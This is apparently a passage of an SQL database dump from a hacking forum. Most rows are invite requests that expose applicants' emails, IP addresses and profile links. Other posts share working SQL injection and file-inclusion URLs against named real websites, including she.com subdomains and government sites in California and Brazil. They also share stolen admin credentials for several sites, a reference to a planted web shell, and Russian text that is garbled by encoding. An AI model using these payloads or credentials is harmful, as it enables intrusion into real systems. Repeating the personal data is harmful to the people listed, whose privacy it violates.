Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/albums204586032 | http://vk.com/albums204586032 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1784, 1576, 0, 'Invite', 2, '{$name}', 1408955827, '[SIZE=\'4\'][COLOR=\'Sienna\']KingJulien[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: kingjulien2013@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.97.106.186\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1785, 1577, 0, 'Psych0tr1a', 11, 'mystery.bigmir.net', 1408957591, '[B]SQLi[/B]\r\n[code]http://mystery.bigmir.net/game/frames/spells_book.php?type=1\'&id=-501+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+[/code]\r\n\r\n[B]çøтðûúð фðùûþò ø ôøрõúтþрøù.[/B]\r\n[code]http://mystery.bigmir.net/game/frames/show_cw_result.php?id=3940180120141542../../../../../game/admin/sql_tester/access.inc[/code]', 1, 0, '', 0, 1, 0, 0, 0), (1786, 1578, 0, 'Invite', 2, '{$name}', 1408961591, '[SIZE=\'4\'][COLOR=\'Sienna\']Silverfox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ecapellari@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.128.58.10\n[*][b]real ip[/b]: 217.128.58.10\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://silverfox.net | silverfox.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1787, 1579, 0, 'Psych0tr1a', 11, 'She.com', 1408963261, '=================\n=================\n[B]59.188.87.208[/B]\n[code]features.she.com\n\n[B]à ðÑÂúрытøõ:[/B]\n/var/www/html/she.com/www.she.com/features/diva/libraries/adodb_lite/adodb-errorhandler.inc.php[/code]\n=================\n=================\n[B]59.188.87.209[/B]\n[code]hair.she.com\nk.she.com\nmembers.she.com\nwatches.she.com\n\n[B]SQLi:[/B]\nhttp://hair.she.com/style/style-library/view.php?id=999999.9+union+select+1,2,3,4,user(),6,7,8,9,10+--+\n\nuser()=root@192.168.1.222\n\n[B]SQLi:[/B]\nURL: http://members.she.com/account/retrieve_username.php\nPOST DATA: altemail=%27or(ExtractValue(1,concat(0x3a,(user()))))+--+&submit=send+me+my+username\n\n[B]à ðÑÂúрытøõ:[/B]\nhttp://watches.she.com/details.php?id=867\'\n\n\n/var/www/html/she.com/members.she.com/librarys/adodb_lite/adodb-errorhandler.inc.php[/code]\n=================\n=================\n[B]59.188.87.214[/B]\n[code]blog.she.com\n\n[B]à ðÑÂúртøõ:[/B]\n/var/www/html/blog.she.com/html/wp-content/themes/koresponsive/sidebar.php[/code]\n=================\n=================\n[B]59.188.87.218[/B]\n[code]betterhk.she.com\n\n[B]SQLi[/B]\nhttp://betterhk.she.com/press_detail.php?year=2013&id=-122%27+union+select+1,user%28%29,3,4,5+--+\n\n[B]ÃÂôüøýúð[/B]\nhttp://betterhk.she.com/admin\nadmin:Zer0zer0\n\n[B]èõûû[/B]\nhttp://betterhk.she.com/betterhongkong.org.php[/code]\n=================\n=================\n[B]59.188.87.222[/B]\n[code]brides-feature.she.com\nprochats.she.com\nk.she.com\n\n[B]SQLi:[/B]\nhttp://brides-feature.she.com/20130903/details.php?pic=1&id=-1+union+select+1,load_file(\'/etc/group\'),3,4,5,6,7,8+--+\n\n[B]à ðÑÂúрытøõ:[/B]\nhttp://brides-feature.she.com/secret-talk/home/index.php?r=front/article&id[]=128&pg=6\n\n/var/www/html/brides-feature.she.com/html/secret-talk/framework/web/CController.php[/code]\n\n=================\n=================\n[B]59.188.87.226[/B]\n[code][url]www.she.com[/url]\n\n[url]www.she.com/templates/components/mod_social_tools.php[/url]\n/var/www/html/she.com /www.she.com/templates/components/mod_social_tools.php[/code]\n=================\n=================', 1, 0, '', 0, 1, 0, 0, 0), (1788, 1579, 1787, 'Psych0tr1a', 11, '', 1408963396, 'ÕÑÂть шõûû þÑÂтðûþÑÂÑŒ ýðùтø ip ÑÂõрòõрð ѠüуÑÂúуûþü ø ûþóøý ѠÿðÑÂÑÂþü ôûѠòхþôð. ßþüþóøтõ ÿûø÷.', 1, 0, '', 0, 1, 0, 0, 0), (1790, 1577, 1785, '123', 41, '', 1408965405, '[url]http://mystery-online.com/blog/svyat/wp-login.php[/url]\nadmin;ckjyjgjnfv', 1, 0, '', 0, 1, 0, 0, 0), (1791, 1580, 1789, '123', 41, '', 1408966202, 'ÑÂтþ ýõ ðüð÷þý, ÑÂтþ ÿрþÑÂтþ ôõô [url]http://millercards.net/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1792, 1581, 0, 'Invite', 2, '{$name}', 1408968672, '[SIZE=\'4\'][COLOR=\'Sienna\']fsqfsdfd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sdfsdf@jabber.root.cz\n[b]e-mail[/b]: sdfdsffdfd@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.140.93.176\n[*][b]real ip[/b]: 41.140.93.176\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id110069862 | http://vk.com/id110069862 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1793, 1580, 1789, 'ropertus', 33, '', 1408975743, 'Have you tried to get code exec with INTO OUTFILE?\n\nhxxp://ec2-54-243-253-27.compute-1.amazonaws.com/bscarddetails.php?cardID=9129+and+0+union+select+load_file%28%22/etc/passwd%22%29--+', 1, 1, '', 0, 1, 0, 0, 0), (1794, 1582, 0, 'Psych0tr1a', 11, '*.ca.gov Include', 1408977680, '[code]http://www.opr.ca.gov/anews.php?id=/etc/passwd%00[/code]\r\n\r\núðú ѠÿþýÑÂû ÑÂтþøт ûøüøт ýð úþûøøчõÑÂтòþ ÑÂøüòþûþò ò ÿðрðüõтрõ. \r\nх÷ úðú þñþùтø, ÿуÑÂть тут ÿþûõöøт.', 1, 0, '', 0, 1, 0, 0, 0), (1795, 1580, 1789, '123', 41, '', 1408977683, 'mcwebmaster:Grimace_21\n[url]http://milbow.com/[/url]\n[url]http://millercards.net/admin/adminhome.php[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1796, 1583, 0, 'Invite', 2, '{$name}', 1408977697, '[SIZE=\'4\'][COLOR=\'Sienna\']Stev[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 664634207\n[b]e-mail[/b]: StevHaxor@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.156.22.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://vk.com/stevemaddenrussia | https://vk.com/stevemaddenrussia \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1797, 1584, 0, 'Psych0tr1a', 11, '*.sp.gov.br include', 1408978380, '[code]http://www.santabarbara.sp.gov.br/esportes/index.php?pag=qweqwqwe[/code]\r\n\r\näøûьтуõтÑÂÑ etc\r\näøûьтуõтÑÂÑ ..\r\núðú þñхþôøть х÷ \r\n%2e ÿрþñþòðû ýõ úðтøт \r\nÑÂýúþôøû etc тþöõ ýõ úðтøт', 1, 0, '', 0, 1, 0, 0, 0), (1798, 1584, 1797, '123', 41, '', 1408978851, 'тðü ø ýуûñðùт рõöõтÑÂÑÂ\nallow_url_include=0\nüþöýþ ÑÂþрцы ÿþчøтðть, ýõ ñþûõõ [url]http://www.santabarbara.sp.gov.br/esportes/index.php?pag=php://filter/convert.base64-encode/resource=index[/url]\n\n[php][/php]', 1, 0, '', 0, 1, 0, 0, 0), (1799, 1585, 0, 'Invite', 2, '{$name}', 1408980066, '[SIZE=\'4\'][COLOR=\'Sienna\']Ronon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 06meh@default.rs\n[b]e-mail[/b]: blossoming.rose2@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 62.210.206.25\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://sheppard-dex.livejournal.com/ | http://sheppard-dex.livejournal.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1800, 1584, 1797, '123', 41, '', 1408980179, 'òõрøфøúðцøѠò ðôüøýúõ ÿрþхþôøт чõрõ÷ ñð÷у, ø øýъõúтð тðü ýõту, òõрøфøúðцøѠ÷ðûþóõýõýýþóþ ю÷òõрѠÿþ ÑÂõÑÂÑÂøø\n[php]\";\n echo \"\";\n exit;\n \n\n\n\n}\n\n?>[/php]', 1, 0, '', 0, 1, 0, 0, 0), (1801, 1584, 1797, '123', 41, '', 1408980231, 'ð òþþñщõ ÑÂúучýыù рõÑÂ, ýðхуѠþý òþþñщõ ýуöõý', 1, 0, '', 0, 1, 0, 0, 0), (1802, 1584, 1797, 'null', 9, '', 1408983741, 'ÿþúûþýýøú óþрþôð ø ÑÂõрøðûð?', 1, 0, '', 0, 1, 0, 0, 0), (1803, 1584, 1797, 'Psych0tr1a', 11, '', 1408985385, 'ÑÂúþрõõ ÑÂõрøðûð :d', 1, 0, '', 0, 1, 0, 0, 0), (1804, 1586, 0, 'Invite', 2, '{$name}', 1408994451, '[SIZE=\'4\'][COLOR=\'Sienna\']alexdok[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: alexdok@ymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.110.133.78\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.17\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.drive2.ru/users/alex-doc/ | https://www.drive2.ru/users/alex-doc/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1805, 1587, 0, 'Invite', 2, '{$name}', 1409010743, '[SIZE=\'4\'][COLOR=\'Sienna\']dwsdsd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asa/erssa\n[b]e-mail[/b]: asasasa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.78.182.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s554.photobucket.com/user/abhigami99/.../char.png.html | http://s554.photobucket.com/user/abhigami99/.../char.png.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1806, 1588, 0, 'Invite', 2, '{$name}', 1409010744, '[SIZE=\'4\'][COLOR=\'Sienna\']dwsdsd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asa/erssa\n[b]e-mail[/b]: asasasa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.78.182.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s554.photobucket.com/user/abhigami99/.../char.png.html | http://s554.photobucket.com/user/abhigami99/.../char.png.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1807, 1083, 1119, 'BigBear', 34, '', 1409045449, 'ÑÂтþ ýð÷ыòðõтÑÂѠÿðùÿ )', 1, 0, '', 0, 1, 0, 0, 0), (1808, 1589, 0, 'Invite', 2, '{$name}', 1409059095, '[SIZE=\'4\'][COLOR=\'Sienna\']Stunx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: stephinphilip.csf@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.253.160.67\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://stunx.com | stunx.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1809, 1590, 0, 'Invite', 2, '{$name}', 1409082829, '[SIZE=\'4\'][COLOR=\'Sienna\']giga[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: id3@hotmail.de\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.107.21.142\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Giga : giga-29@mail.ru : 195.162.41.131 : 4d39d430b26ae775fcdf24d26b0155d0\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://giga.ulg.ac.be | giga.ulg.ac.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1810, 1591, 0, 'Invite', 2, '{$name}', 1409085977, '[SIZE=\'4\'][COLOR=\'Sienna\']alex[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: admin@corel.tv\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.233.86.175\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Alex : sdfsdfsdf87@mail.ru : 77.181.93.131 : e8d2aa5b8ed5521103b58b2ceeb531d7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/sorryimalex | https://twitter.com/sorryimalex \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1811, 1592, 0, 'Invite', 2, '{$name}', 1409150970, '[SIZE=\'4\'][COLOR=\'Sienna\']freebluewolf[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: harelce@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.187.2.128\n[*][b]real ip[/b]: 78.187.2.128\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pregen.net/forum/member.php?u=3043 | http://pregen.net/forum/member.php?u=3043 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1812, 1593, 0, 'Invite', 2, '{$name}', 1409153560, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sadasd@asdasd.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.162.68.245\n[*][b]real ip[/b]: 186.162.68.245\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 